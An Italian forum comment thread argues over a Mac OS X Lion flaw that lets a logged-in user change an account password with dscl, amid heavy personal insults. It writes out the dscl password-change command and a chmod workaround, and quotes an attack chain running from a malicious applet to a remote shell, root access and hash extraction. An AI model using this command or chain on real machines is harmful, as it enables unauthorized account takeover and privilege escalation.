            email.Era un ESEMPIO!!!!!!! Se ti arriva una email dalla stangona che c'è nel tuo profilo facebook voglio vedere come non lo apri...


            Sveglia Ruppolo, ho fatto questo di lavoro,
            e
            per

            tanti anni (dalla parte dei buoni, ecco
            perchè
            ti

            dico che sminuire è da

            folli!)

            Cosa avresti fatto tu di lavoro?Quello che spiegava alle aziende con l'informatica in mano ai conslutanti (non è un refuso) come te come non farsi XXXXXXX i progetti dalla concorrenza.









            Ruppolo, diavolo, ma puoi per una
            volta


            essere



            serio e dire "questo è grave" come
            hanno


            fatto...



            vediamo...



            tutti???





            BALLE. Io vedo che la maggior parte
            della

            gente


            non riesce a riprodurre questo bug.
            Chissà


            perché...



            Veramente qui è da 20 giorni che l'abbiamo

            riprodotto.

            Bravi, e ora vi arriva il premio?No, non arriva niente, abbiamo già sistemato, ma Lion per questo e altri motivi se ne sta su una macchina sola, in test ed in attesa di nuove fantastiche razzate.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            BALLE. Io vedo che la maggior parte della gente
            non riesce a riprodurre questo bug. Chissà
            perché...Eh beh! Fino a quando la gente fa:dscl localhost -passwd /Search/testuserc'è qualche problemino di fondo...
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            - Scritto da: ruppolo


            BALLE. Io vedo che la maggior parte della
            gente

            non riesce a riprodurre questo bug. Chissà

            perché...

            Eh beh! Fino a quando la gente fa:

            dscl localhost -passwd /Search/testuser

            c'è qualche problemino di fondo...Allora vedi che chi sa come fare sono 4 gatti.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Ma sei cretino o cosa?Chiunque conosce linux unix e un minimo di informatica di base lo sa fare!!! Ora se la gente non sa che:dscl localhost -passwd /Search/testuser<
            dscl localhost -passwd /Search/Users/testuserforse non è questione che sia difficile, è questione che non si sa cosa si sta scrivendo.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Mi hanno XXXXto un post, solo perchè affermavo quello che tutti già sanno.Ad ogni modo:dscl localhost -passwd /Search/testuserè diverso dadscl localhost -passwd /Search/Users/testuserMa forse essendo che tu di OSX ne sai poco pochetto ti sfugge...
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Mi hanno XXXXto un post, solo perchè affermavo
            quello che tutti già
            sanno.

            Ad ogni modo:

            dscl localhost -passwd /Search/testuser

            è diverso da

            dscl localhost -passwd /Search/Users/testuser


            Ma forse essendo che tu di OSX ne sai poco
            pochetto ti
            sfugge...Diciamo che leggo divertito queste putt**ate.
          • Tuo padre scrive:
            Re: quindi per cambiare una password
            Ridi senza capire di cosa stai ridendo?
          • gnammolo scrive:
            Re: quindi per cambiare una password
            strano per un macaco, di solito sono le bertucce
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: Tuo padre
            Ridi senza capire di cosa stai ridendo?Io rido? Mi pare sia hermanesse che ad ogni post mette l'emoticon che ride...
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            ma veramente non ti rendi conto che chiunque passa di qua ti prende per i fondelli?
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            ma veramente non ti rendi conto che chiunque
            passa di qua ti prende per i
            fondelli?Ma veramente non ti rendi conto di quanto patetico sei?
          • Ego scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            ma veramente non ti rendi conto che chiunque

            passa di qua ti prende per i

            fondelli?

            Ma veramente non ti rendi conto di quanto
            patetico
            sei?basta che oggi poverino ruppolo mi sta facendo davvero pena, non sa neanche più quello che scrive nel patetico tentativo di difendere il bug di osx, per favore lasciatelo in pace che se muore è inutile continuare a venire su PI per farsi delle risate, comunque è vero ruppolo, tutti ti prendono in giro, anche in altri forum e blog, ti citano come esempio di ignoranza
          • Fiber scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            ma veramente non ti rendi conto che chiunque
            passa di qua ti prende per i
            fondelli?quando uno non è capace di intendere e di volere ma se ne intende solo di travi come puo' rendersi conto anche di una cosa elementare come quella che gli hai appena scritto ?non si renderà mai conto di niente ;)
        • gnammolo scrive:
          Re: quindi per cambiare una password

          Colgo l'occasione per far notare che la
          maggioranza degli utenti sono rimasti al sistema
          del 2001
          (rotfl)pensa quanto dura una macchina win! Cmq ci sono stati 3 service pack, sopratutto il SP 2 che è stato un radicale cambio per XP, sopratutto sul fronte sicurezza, da poterlo considerare un upgrade di sistema vero e proprio (non che fosse unXXXXXta intendiamoci ma xp del 2001 è ben diverso da xp SP3 ahh ma è vero il macaco guarda solo all'aspetto non hai contenuti... GUI = SO!)
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: gnammolo

            Colgo l'occasione per far notare che la

            maggioranza degli utenti sono rimasti al
            sistema

            del 2001

            (rotfl)

            pensa quanto dura una macchina win!Ben poco, specie per quelli che hanno comprato dei PC dopo l'uscita di WIndows Vista, senza il famigerato bollino, o con il bollino truffaldino "Vista Capable".
            Cmq ci sono
            stati 3 service pack, sopratutto il SP 2 che è
            stato un radicale cambio per XP,Radicale? Ma se non è cambiato praticamente nulla!
            sopratutto sul
            fronte sicurezza, Ah certo, visto che è sempre stato un colabrodo, cos'altro vuoi che aggiornino?
            da poterlo considerare un
            upgrade di sistema vero e proprio (non che fosse
            unXXXXXta intendiamoci ma xp del 2001 è ben
            diverso da xp SP3Non cambia un piffero. Per caso trova i documenti in base al contenuto? Per caso supporta i PDF?
            ahh ma è vero il macaco guarda
            solo all'aspetto non hai contenuti... GUI =
            SO!)si si, "hai" contenuti... Dio li fa e poi li accoppia.
          • gnammolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: gnammolo


            Colgo l'occasione per far notare che la


            maggioranza degli utenti sono rimasti al

            sistema


            del 2001


            (rotfl)



            pensa quanto dura una macchina win!

            Ben poco, specie per quelli che hanno comprato
            dei PC dopo l'uscita di WIndows Vista, senza il
            famigerato bollino, o con il bollino truffaldino
            "Vista
            Capable".Senza senso, una frase buttata lì per far caciara...


            Cmq ci sono

            stati 3 service pack, sopratutto il SP 2 che
            è

            stato un radicale cambio per XP,

            Radicale? Ma se non è cambiato praticamente nulla!mica tanto poco, apple ne avrebbe fatto sicuramente una distribuzione a 29.99 http://it.wikipedia.org/wiki/Windows_XP#Service_Pack_2ripeto guardi solo l'aspetto


            sopratutto sul

            fronte sicurezza,

            Ah certo, visto che è sempre stato un colabrodo,
            cos'altro vuoi che
            aggiornino?purtroppo vero sul fatto che è un colabrodo ma come al solito non ragioni, perchè non dovrebbero aggiornare? lasciare tutto com'é? perché "cos'altro vuoi che aggiornino?"Davvero ruppolo il tuo ragionamento stà a 0


            da poterlo considerare un

            upgrade di sistema vero e proprio (non che
            fosse

            unXXXXXta intendiamoci ma xp del 2001 è ben

            diverso da xp SP3

            Non cambia un piffero. Per caso trova i documenti
            in base al contenuto? http://en.wikipedia.org/wiki/Windows_SearchPer caso supporta i
            PDF?se Xp li legge l'antitrust il giorno dopo lo fa togliere (browser do u remember?)


            ahh ma è vero il macaco guarda

            solo all'aspetto non hai contenuti... GUI =

            SO!)

            si si, "hai" contenuti... Dio li fa e poi li
            accoppia.mi è scappato... cmq la net etiquette prevede di non essere intolleranti con chi commette errori sintattici o grammaticali.Sempre più rigido sulle tue posizioni cmq.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: gnammolo
            - Scritto da: ruppolo

            - Scritto da: gnammolo



            Colgo l'occasione per far notare
            che
            la



            maggioranza degli utenti sono
            rimasti
            al


            sistema



            del 2001



            (rotfl)





            pensa quanto dura una macchina win!



            Ben poco, specie per quelli che hanno
            comprato

            dei PC dopo l'uscita di WIndows Vista, senza
            il

            famigerato bollino, o con il bollino
            truffaldino

            "Vista

            Capable".

            Senza senso, una frase buttata lì per far
            caciara...Senza senso? Fammi capire, un utente compra OGGI un computer che non è in grado di far girare la versione uscita 3 mesi PRIMA del sistema operativo che gli hanno infilato su per... e questo non avrebbe senso come risposta a "pensa quanto dura una macchina win"? DURA UN CA**O! È già vecchia quando la compri!Un paio di neurini (ini) funzionanti li hai?





            Cmq ci sono


            stati 3 service pack, sopratutto il SP
            2
            che

            è


            stato un radicale cambio per XP,



            Radicale? Ma se non è cambiato praticamente
            nulla!

            mica tanto poco, apple ne avrebbe fatto
            sicuramente una distribuzione a 29.99
            http://it.wikipedia.org/wiki/Windows_XP#Service_Pa

            ripeto guardi solo l'aspettoMa quale aspetto, OS X è stato aggiornato nelle fondamenta con decine di tecnologie!





            sopratutto sul


            fronte sicurezza,



            Ah certo, visto che è sempre stato un
            colabrodo,

            cos'altro vuoi che

            aggiornino?

            purtroppo vero sul fatto che è un colabrodo ma
            come al solito non ragioni, perchè non dovrebbero
            aggiornare? lasciare tutto com'é? perché
            "cos'altro vuoi che
            aggiornino?"
            Davvero ruppolo il tuo ragionamento stà a 0"sta" si scrive senza accento. Se tu avessi un sistema operativo moderno, come OS X, lo sapresti.




            da poterlo considerare un


            upgrade di sistema vero e proprio (non
            che

            fosse


            unXXXXXta intendiamoci ma xp del 2001 è
            ben


            diverso da xp SP3



            Non cambia un piffero. Per caso trova i
            documenti

            in base al contenuto?

            http://en.wikipedia.org/wiki/Windows_Search <i
            For Windows XP, Windows Search is available as an add-on application. </i
            La differenza tra una applicazione add-on e una funzione del sistema operativo la conosci?
            Per caso supporta i

            PDF?

            se Xp li legge l'antitrust il giorno dopo lo fa
            togliere (browser do u
            remember?)I remember un browser di nome Explorer innestato nel sistema operativo in modo da non poter essere sostituito.





            ahh ma è vero il macaco guarda


            solo all'aspetto non hai contenuti...
            GUI
            =


            SO!)



            si si, "hai" contenuti... Dio li fa e poi li

            accoppia.

            mi è scappato... cmq la net etiquette prevede di
            non essere intolleranti con chi commette errori
            sintattici o
            grammaticali.

            Sempre più rigido sulle tue posizioni cmq.Il punto è che parli di aspetto e contenuti quando è proprio Microsoft che continua ad aggiornare Windows per aspetto, e non per contenuti. Ti ricordo che Windows è NATO proprio come aspetto, una GUI sopra il DOS da lanciare a mano.
          • gnammolo scrive:
            Re: quindi per cambiare una password
            ecco hai sviato il discorso... ma la falla grave apple rimane!
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Tipico di Ruppolo.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: gnammolo
            ecco hai sviato il discorso... ma la falla grave
            apple
            rimane!Non ho sviato nulla.La falla rimane ma non è una falla grave, tutt'altro.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            La falla rimane ma non è una falla grave,
            tutt'altro.È una falla positiva!!!! E anche quella di Skype è una falla positiva!E anche il fatto che con una PDF, o con una pagina web, ti incriccano come vogliono iOS è/era una cosa positiva!
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            - Scritto da: ruppolo


            La falla rimane ma non è una falla grave,

            tutt'altro.

            È una falla positiva!!!! E anche quella di
            Skype è una falla
            positiva!Falla positiva? (rotfl)
            E anche il fatto che con una PDF,Una? PDF femmina? (rotfl)
            o con una
            pagina web, ti incriccano come vogliono iOS è/era
            una cosa
            positiva!In quel caso si, visto che le uniche due volte che l'hanno sfruttata serviva per fare il XXXXXXXXX :D
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo




            La falla rimane ma non è una falla
            grave,


            tutt'altro.



            È una falla positiva!!!! E anche quella
            di

            Skype è una falla

            positiva!

            Falla positiva? (rotfl)Se dici tutt'altro, avrà una valenza positiva per quelli come te!!!


            E anche il fatto che con una PDF,
            blah blah blah...Ruppolo: c'è una falla GRAVE su OSX e una meno grave su iOS.Punto.Fattene una fottuta ragione e vai a rompere le scatole da un'altra parte!
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            - Scritto da: ruppolo






            La falla rimane ma non è una falla

            grave,



            tutt'altro.





            È una falla positiva!!!! E anche
            quella

            di


            Skype è una falla


            positiva!



            Falla positiva? (rotfl)

            Se dici tutt'altro, avrà una valenza positiva per
            quelli come
            te!!!





            E anche il fatto che con una PDF,


            blah blah blah...

            Ruppolo: c'è una falla GRAVE su OSX e una meno
            grave su
            iOS.

            Punto.Ma perché non scrivi "GRAVE" in grassetto? Fa più effetto, sai?
            Fattene una fottuta ragione e vai a rompere le
            scatole da un'altra
            parte!Nervosetto?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo


            - Scritto da: hermanhesse



            - Scritto da: ruppolo








            La falla rimane ma non è una
            falla


            grave,




            tutt'altro.







            È una falla positiva!!!! E
            anche

            quella


            di



            Skype è una falla



            positiva!





            Falla positiva? (rotfl)



            Se dici tutt'altro, avrà una valenza
            positiva
            per

            quelli come

            te!!!








            E anche il fatto che con una PDF,




            blah blah blah...



            Ruppolo: c'è una falla GRAVE su OSX e una
            meno

            grave su

            iOS.



            Punto.

            Ma perché non scrivi "GRAVE" in grassetto? Fa più
            effetto,
            sai?Ci avevo pensato, ma ci vorrebbe un martello e la tua testa a portata di mano per farti ragionare!


            Fattene una fottuta ragione e vai a rompere
            le

            scatole da un'altra

            parte!

            Nervosetto?La fattura arriva.
          • ruppolo scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Ci avevo pensato, ma ci vorrebbe un martello e la
            tua testa a portata di mano per farti
            ragionare!Eh beh, quando uno è a corto di argomenti...
            La fattura arriva.Ecco, come mago ciarlatano avresti forse qualche chance...
          • Funz scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            - Scritto da: ruppolo


            La falla rimane ma non è una falla grave,

            tutt'altro.

            È una falla positiva!!!! E anche quella di
            Skype è una falla
            positiva!Cosa vuol dire, che invece di imbarcare acqua la fa uscire? L'avessero saputo quelli del Titanic... :p
            E anche il fatto che con una PDF, o con una
            pagina web, ti incriccano come vogliono iOS è/era
            una cosa
            positiva!Non è un bàgg, è un a fìciur :p
        • Prozac scrive:
          Re: quindi per cambiare una password
          - Scritto da: ruppolo
          - Scritto da: hermanhesse

          Quando è uscito XP c'era già OSX...

          Wikipedia dice il contrario:
          http://en.wikipedia.org/wiki/Windows_xp
          <i
          First released to computer
          manufacturers on August 24, 2001 </i



          http://en.wikipedia.org/wiki/Mac_os_x#Version_10.0
          <i
          On March 24, 2001, Apple released Mac
          OS X v10.0 </i

          Ormai sei così alla frutta che ti smentisci da solo!!!Hermanhesse ti ha detto: Quando è uscito <b
          Windowx XP </b
          (e tu hai citato Wikipedia: 24/ <b
          08 </b
          /2001) <b
          c'era già OS X </b
          (e tu hai citato, di nuovo, Wikipedia: 24/ <b
          03 </b
          /2001). Quindi le cose sono due:1) Non sai leggere.2) Sei così alla frutta che non ragioni più (non che prima ragionassi chissà quanto)
  • eleirbag scrive:
    Soluzione temporanea
    Da shell logicamente:$ sudo chmod 100 /usr/bin/dsclQui il link dove viene descritta:http://m.zdnet.com/blog/hardware/mac-os-x-lion-flaw-allows-unauthorized-password-changes/14883Visto che vi si può incorrere anche da remoto,basta usare Safari anche come utente-limitato,converrebbe cambiare i diritti di dscl fintantochèApple non rilascerà una patch ufficiale.
    • atarilover sloggata scrive:
      Re: Soluzione temporanea
      - Scritto da: eleirbag
      Da shell logicamente:
      $ sudo chmod 100 /usr/bin/dscl

      Qui il link dove viene descritta:
      http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla

      Visto che vi si può incorrere anche da remoto,
      basta usare Safari anche come utente-limitato,
      converrebbe cambiare i diritti di dscl fintantochè
      Apple non rilascerà una patch ufficiale.Una soluzione semplice, ma che non so quanti utenti Unix consumer saprebbero effettuare.Penso comunque che alla Apple prepareranno presto una patch per risolvere la vulnerabilità.(atari)
      • panda rossa scrive:
        Re: Soluzione temporanea
        - Scritto da: atarilover sloggata
        Una soluzione semplice, ma che non so quanti
        utenti Unix consumer saprebbero
        effettuare.Non esiste l'utente unix consumer.Esiste solo l'utente unix, il quale lo sa fare.
        • atarilover sloggata scrive:
          Re: Soluzione temporanea
          - Scritto da: panda rossa
          - Scritto da: atarilover sloggata

          Una soluzione semplice, ma che non so quanti

          utenti Unix consumer saprebbero

          effettuare.

          Non esiste l'utente unix consumer.
          Esiste solo l'utente unix, il quale lo sa fare.Posso anche essere d'accordo con te, ma Mac OSX è uno Unix ma non mi pare hce tutti quelli che comprano il mac siano capaci di utilizzare la riga di comando... Così come non tutti quelli che usano linux lo sanno fare.Per queste persone non resta che aspettare (se arriverà) la patch del SO di Apple.Saluti!(atari)
          • panda rossa scrive:
            Re: Soluzione temporanea
            - Scritto da: atarilover sloggata
            - Scritto da: panda rossa

            - Scritto da: atarilover sloggata


            Una soluzione semplice, ma che non so
            quanti


            utenti Unix consumer saprebbero


            effettuare.



            Non esiste l'utente unix consumer.

            Esiste solo l'utente unix, il quale lo sa
            fare.

            Posso anche essere d'accordo con te, ma Mac OSX è
            uno Unix ma non mi pare hce tutti quelli che
            comprano il mac siano capaci di utilizzare la
            riga di comando... Così come non tutti quelli che
            usano linux lo sanno
            fare.Il fatto che osx derivi da linux non fa di osx un linux.Gli e' stata costruita sopra una interfaccia a misura di macaco, e tutto quello che non si puo' fare tramite la suddetta interfaccia, non si puo' fare perche' " <i
            vuolsi cosi' cola' dove si puote! E piu' non dimandare. </i
            " scrisse il Poeta.Mentre chi usa linux per scelta, o lo sa usare, o comunque lo sapra' usare. E' una questione di forma mentis.Chi ha la mente chiusa, sceglie sistemi chiusi, chi ha la mente aperta, sceglie sistemi aperti.
            Per queste persone non resta che aspettare (se
            arriverà) la patch del SO di
            Apple....e nel frattempo impareranno anche loro a rimettersi la password a posto dopo che qualcuno gliel'avra' cambiata sotto il naso.Oppure no, che tanto un mac, anche se non sai la password, svolge comunque la sua principale funzione: quella di far vedere che si possiede il mac.
          • atarilover sloggata scrive:
            Re: Soluzione temporanea
            - Scritto da: panda rossa

            Il fatto che osx derivi da linux non fa di osx un
            linux.Mai detto questo, ma OsX è uno UNIX certificato. (Ma non derivava da BSD?)
            Gli e' stata costruita sopra una interfaccia a
            misura di macaco, e tutto quello che non si puo'
            fare tramite la suddetta interfaccia, non si puo'
            fare perche' " <i
            vuolsi cosi' cola' dove
            si puote! E piu' non dimandare. </i
            "
            scrisse il
            Poeta.
            Aspetta, ma la console esiste e sopratutto una volta aperta hai tutti i comandi che ti garantirebbe un sistema tipo BSD.
            Mentre chi usa linux per scelta, o lo sa usare, o
            comunque lo sapra' usare. E' una questione di
            forma
            mentis.
            Chi ha la mente chiusa, sceglie sistemi chiusi,
            chi ha la mente aperta, sceglie sistemi
            aperti.
            Su questo sono d'accordo con te. io uso linux da 6 anni oramai e non me ne pento, ma ammetto che esiste chi può volere un sistema a base UNIX stabile e facile da usare ( anche se questo richiede di "nascondere" il funzionamento del sistema.

            Per queste persone non resta che aspettare
            (se

            arriverà) la patch del SO di

            Apple.

            ...e nel frattempo impareranno anche loro a
            rimettersi la password a posto dopo che qualcuno
            gliel'avra' cambiata sotto il
            naso.
            Oppure no, che tanto un mac, anche se non sai la
            password, svolge comunque la sua principale
            funzione: quella di far vedere che si possiede il
            mac.Penso invece che non tutti gli utenti mac seguono le news del mondo informatico e quindi magari non sanno nemmeno come applicare la patch manuale descritta sopra.Per questo spero che Apple intervenga modificando il comportamento di OSX con una patch ufficiale.Ad ogni modo, meno pc/mac compromessi ci sono in rete e meglio vivo anche io.Saluti(atari)
          • Darwin scrive:
            Re: Soluzione temporanea
            - Scritto da: atarilover sloggata
            Mai detto questo, ma OsX è uno UNIX certificato.
            (Ma non derivava da
            BSD?)FreeBSD+NeXTSTEP+alcune parti di NetBSD.
            Aspetta, ma la console esiste e sopratutto una
            volta aperta hai tutti i comandi che ti
            garantirebbe un sistema tipo
            BSD.Esatto.
          • marco scrive:
            Re: Soluzione temporanea
            OSX non deriva da linux.
          • krane scrive:
            Re: Soluzione temporanea
            - Scritto da: marco
            OSX non deriva da linux.Cio' non toglie che sia uno unix.
          • atarilover sloggata e stufa dei pignoli scrive:
            Re: Soluzione temporanea
            - Scritto da: marco
            OSX non deriva da linux.E dove lo avrei detto, di grazia?Ho solo detto che OSX è uno UNIX.Problemi di comprensione?(atari)
          • Darwin scrive:
            Re: Soluzione temporanea
            Imparare a quotare?Troppo difficile?
    • ruppolo scrive:
      Re: Soluzione temporanea
      - Scritto da: eleirbag
      Da shell logicamente:
      $ sudo chmod 100 /usr/bin/dscl

      Qui il link dove viene descritta:
      http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla

      Visto che vi si può incorrere anche da remoto,Da remoto? Vuoi dire che puoi impartire ordini via telefonica ad un complice davanti il computer?
      basta usare Safari anche come utente-limitato,
      converrebbe cambiare i diritti di dscl fintantochè
      Apple non rilascerà una patch ufficiale.Si certo, ora corro lingua penzoloni a cambiare i diritti di quella cosa lì...
      • eleirbag scrive:
        Re: Soluzione temporanea
        Non capisco il tuo commento ?Mai hai almeno letto la notizia per intero ?Sopratutto per quanto riguarda l'attacco portabilevia sito sito Web.
        • ruppolo scrive:
          Re: Soluzione temporanea
          - Scritto da: eleirbag
          Non capisco il tuo commento ?
          Mai hai almeno letto la notizia per intero ?
          Sopratutto per quanto riguarda l'attacco portabile
          via sito sito Web.Non esiste alcun attacco "portabile".
          • eleirbag scrive:
            Re: Soluzione temporanea
            Eh Scusa ?
          • sgabe scrive:
            Re: Soluzione temporanea
            Negare anche l'evidenza per difendere l'apple........
          • froyone scrive:
            Re: Soluzione temporanea
            - Scritto da: eleirbag
            Eh Scusa ?e' sotto shock, e' confuso.Povero ruppolo, che botta!!
          • hermanhesse scrive:
            Re: Soluzione temporanea
            Poveraccio.http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html"A user with administrative rights is browsing the internet with Safari. The user happens to browse to a website hosting a malicious Java Applet. Unbeknownst to the user, they allow the innocent looking Java Applet to run. The Applet will proceed to make a connection back to the attacker, providing the attacker with full shell access. Whilst the attacker has access to the system, they are provided only with limited user privileges (they still do not have root access). This would limit what an attacker could accomplish. However, with the vulnerabilities described above the attacker now has an advantage: they can change the password of the current user. Now remember, the current user is an administrator. So now all the attacker has to do is sudo s to become root. If lets say the victim did not have administrative rights, the attacker still has the ability to extract user hashes from the system and attempt to crack them."Sei duro forte eh??? Mi chiedo perchè perdo il tempo a spiegarti le cose...
          • ruppolo scrive:
            Re: Soluzione temporanea
            - Scritto da: hermanhesse
            Poveraccio.

            http://www.defenceindepth.net/2011/09/cracking-os-

            "
            A user with administrative rights is browsing the
            internet with Safari. The user happens to browse
            to a website hosting a malicious Java Applet.
            Unbeknownst to the user, they allow the innocent
            looking Java Applet to run. The Applet will
            proceed to make a connection back to the
            attacker, providing the attacker with full shell
            access. Whilst the attacker has access to the
            system, they are provided only with limited user
            privileges (they still do not have root access).
            This would limit what an attacker could
            accomplish. However, with the vulnerabilities
            described above the attacker now has an
            advantage: they can change the password of the
            current user. Now remember, the current user is
            an administrator. So now all the attacker has to
            do is sudo s to become root. If lets say the
            victim did not have administrative rights, the
            attacker still has the ability to extract user
            hashes from the system and attempt to crack
            them.
            "


            Sei duro forte eh??? Mi chiedo perchè perdo il
            tempo a spiegarti le
            cose...Quello che ha scritto sta roba non ha provato a mettere in pratica, altrimenti si sarebbe accorto che il suo applet java resta con un palmo al naso.
          • hermanhesse scrive:
            Re: Soluzione temporanea
            Fruttolo, una applet java signed può lanciare sul tuo bel safari comandi di sitema nella sua sandbox e ciucciarsi l'hashes delle password.
          • Darwin scrive:
            Re: Soluzione temporanea
            Mamma mia che rosicata... :D
      • Ego scrive:
        Re: Soluzione temporanea
        - Scritto da: ruppolo
        - Scritto da: eleirbag

        Da shell logicamente:

        $ sudo chmod 100 /usr/bin/dscl



        Qui il link dove viene descritta:


        http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla



        Visto che vi si può incorrere anche da
        remoto,

        Da remoto? Vuoi dire che puoi impartire ordini
        via telefonica ad un complice davanti il
        computer?perchè da solo non riesci ad aprire il browser su una pagina web? vuoi anche l'aiuto?


        basta usare Safari anche come
        utente-limitato,

        converrebbe cambiare i diritti di dscl
        fintantochè

        Apple non rilascerà una patch ufficiale.

        Si certo, ora corro lingua penzoloni a cambiare i
        diritti di quella cosa
        lì.....e ma si vede che sei un consulente informatico, assurdo che gente così lavori nell'informatica
        • ruppolo scrive:
          Re: Soluzione temporanea
          - Scritto da: Ego
          - Scritto da: ruppolo

          - Scritto da: eleirbag


          Da shell logicamente:


          $ sudo chmod 100 /usr/bin/dscl





          Qui il link dove viene descritta:





          http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla





          Visto che vi si può incorrere anche da

          remoto,



          Da remoto? Vuoi dire che puoi impartire
          ordini

          via telefonica ad un complice davanti il

          computer?

          perchè da solo non riesci ad aprire il browser su
          una pagina web? vuoi anche
          l'aiuto?Quale pagina? Dai, dimmi quale pagina...





          basta usare Safari anche come

          utente-limitato,


          converrebbe cambiare i diritti di dscl

          fintantochè


          Apple non rilascerà una patch ufficiale.



          Si certo, ora corro lingua penzoloni a
          cambiare
          i

          diritti di quella cosa

          lì...

          ..e ma si vede che sei un consulente informatico,
          assurdo che gente così lavori
          nell'informaticaÈ quello che dico tutti i giorni. Ma per fortuna questo pattume di informatici se ne andrà giù per lo sciacquone, tra non molto.
          • Ego scrive:
            Re: Soluzione temporanea
            - Scritto da: ruppolo
            - Scritto da: Ego

            - Scritto da: ruppolo


            - Scritto da: eleirbag



            Da shell logicamente:



            $ sudo chmod 100 /usr/bin/dscl







            Qui il link dove viene descritta:









            http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla







            Visto che vi si può incorrere
            anche
            da


            remoto,





            Da remoto? Vuoi dire che puoi impartire

            ordini


            via telefonica ad un complice davanti il


            computer?



            perchè da solo non riesci ad aprire il
            browser
            su

            una pagina web? vuoi anche

            l'aiuto?

            Quale pagina? Dai, dimmi quale pagina...no non te lo dico.. perchè sei troppo stupido









            basta usare Safari anche come


            utente-limitato,



            converrebbe cambiare i diritti di
            dscl


            fintantochè



            Apple non rilascerà una patch
            ufficiale.





            Si certo, ora corro lingua penzoloni a

            cambiare

            i


            diritti di quella cosa


            lì...



            ..e ma si vede che sei un consulente
            informatico,

            assurdo che gente così lavori

            nell'informatica

            È quello che dico tutti i giorni. Ma per
            fortuna questo pattume di informatici se ne andrà
            giù per lo sciacquone, tra non
            molto.vuoi dire che apple si è stancata di trattare la tua lingua come carta igenica? ne sono felice
          • Darwin scrive:
            Re: Soluzione temporanea
            - Scritto da: ruppolo
            È quello che dico tutti i giorni. Ma per
            fortuna questo pattume di informatici se ne andrà
            giù per lo sciacquone, tra non
            molto.Ti stai dando all'ippica?Meno male, va....fai bene.
      • logicamente non loggato scrive:
        Re: Soluzione temporanea
        - Scritto da: ruppolo
        - Scritto da: eleirbag

        Da shell logicamente:

        $ sudo chmod 100 /usr/bin/dscl



        Qui il link dove viene descritta:


        http://m.zdnet.com/blog/hardware/mac-os-x-lion-fla



        Visto che vi si può incorrere anche da
        remoto,

        Da remoto? Vuoi dire che puoi impartire ordini
        via telefonica ad un complice davanti il
        computer?Una volta di più dimostri la tua notevole "competenza"... è a causa di interventi come questo che gli utenti mac passano tutti per incompetenti.
        Si certo, ora corro lingua penzoloni a cambiare i
        diritti di quella cosa
        lì...Tentativo di sarcasmo fuori luogo...
  • nome e cognome scrive:
    Ma nooo
    Ho letto questa notizia troppo tardi, oggi c'era in ufficio un consulente con il suo fichizzimo mecbuc eir nuovo di trinca e l'ha lasciato incustodito per una buona mezz'ora ... a saperlo ci liberavamo di lui in due microsecondi netti.
    • Ipadder scrive:
      Re: Ma nooo
      Io ho il problema contrario, continuamente mi chiede la password per fare ogni cosa,Ps. Chi non conosce il mac non può fargli niente, neanche volendo
      • Darwin scrive:
        Re: Ma nooo
        - Scritto da: Ipadder
        Ps. Chi non conosce il mac non può fargli niente,
        neanche
        volendoBasta conoscere UNIX e te lo rigiri come un calzino.
  • ruppolo scrive:
    Problema inesistente
    Gli utenti Mac si dividono grosso modo in 2 categorie:Quelli che la password non la vogliono, e quindi il sistema non chiede alcuna password, e quelli che invece hanno pensato alla sicurezza e hanno disabilitato il login automatico.Quindi il problema non si pone.
    • non fumo non bevo e non dico parolacce scrive:
      Re: Problema inesistente
      - Scritto da: ruppolo
      Gli utenti Mac si dividono grosso modo in 2
      categorie:

      Quelli che la password non la vogliono, e quindi
      il sistema non chiede alcuna password, e quelli
      che invece hanno pensato alla sicurezza e hanno
      disabilitato il login
      automatico.

      Quindi il problema non si pone.è inutile che glie lo spieghi, tanto non lo capiscono.
    • Tony scrive:
      Re: Problema inesistente
      Appunto, se non conosci lo username torni al punto di partenza.
    • Ego scrive:
      Re: Problema inesistente
      - Scritto da: ruppolo
      Gli utenti Mac si dividono grosso modo in 2
      categorie:

      Quelli che la password non la vogliono, e quindi
      il sistema non chiede alcuna password, e quelli
      che invece hanno pensato alla sicurezza e hanno
      disabilitato il login
      automatico.

      Quindi il problema non si pone.giusto, quindi perchè affrettarsi per una patch no?
    • jepessen scrive:
      Re: Problema inesistente
      Fra cretini e idioti quindi...Vedi se capitava a Windows come ci andavi giù di brutto... Ah ma il futuro login si baserà sui ferormoni ormai...- Scritto da: ruppolo
      Gli utenti Mac si dividono grosso modo in 2
      categorie:

      Quelli che la password non la vogliono, e quindi
      il sistema non chiede alcuna password, e quelli
      che invece hanno pensato alla sicurezza e hanno
      disabilitato il login
      automatico.

      Quindi il problema non si pone.
      • Sherpya scrive:
        Re: Problema inesistente
        - Scritto da: jepessen
